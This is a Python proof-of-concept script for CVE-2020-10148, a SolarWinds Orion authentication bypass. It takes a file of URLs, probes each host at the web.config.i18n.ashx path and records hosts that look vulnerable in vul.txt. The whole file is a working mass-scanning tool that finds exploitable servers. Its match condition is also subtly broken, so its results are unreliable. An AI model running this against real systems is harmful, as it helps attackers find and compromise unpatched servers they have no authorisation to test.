CVE-2020-10148.py

#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
#affected versions are before SolarWinds Orion 2020.2.1 HF 2 and 2019.4 HF 6

import requests,sys,colorama
from colorama import *
init(autoreset=True)


banner='''\033[1;33;40m
  _______      ________    ___   ___ ___   ___        __  ___  __ _  _   ___  
 / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ |/ _ \/_ | || | / _ \ 
| |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | | | || | || || (_) |
| |      \ \/ / |  __|______/ /| | | |/ /| | | |______| | | | || |__   _> _ < 
| |____   \  /  | |____    / /_| |_| / /_| |_| |      | | |_| || |  | || (_) |
 \_____|   \/   |______|  |____|\___/____|\___/       |_|\___/ |_|  |_| \___/ 
                                                                                                                                                                                                                                 
'''


def verify():
	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
	payload= '/web.config.i18n.ashx?l=en-US&v=B1anda0' #v值可自定义，不可为空
	poc=urls+payload
	try:
		requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
		response=requests.get(poc,headers=headers,timeout=15,verify=False)
		if response.status_code==200 and "SolarWinds.Orion.Core.Common" and "/Orion/NetPerfMon/TemplateSiblingIconUrl" in response.content:
			print(u'\033[1;31;40m[+]{} is solarwinds remote code execution vulnerability'.format(urls))
			#将漏洞地址输出在Vul.txt中
			f=open('./vul.txt','a')
			f.write(urls)
			f.write('\n')
		else:
			print('\033[1;32;40m[-]{} None'.format(urls))
	except:
		print('{} request timeout'.format(urls))


if __name__ == '__main__':
	print (banner)
	if len(sys.argv)!=2:
		print('Example:python CVE-2020-10148.py urls.txt')
	else:
		file = open(sys.argv[1])
		for url in file.readlines():
			urls=url.strip()
			if urls[-1]=='/':
				urls=urls[:-1]
			verify()
		print ('Check Over')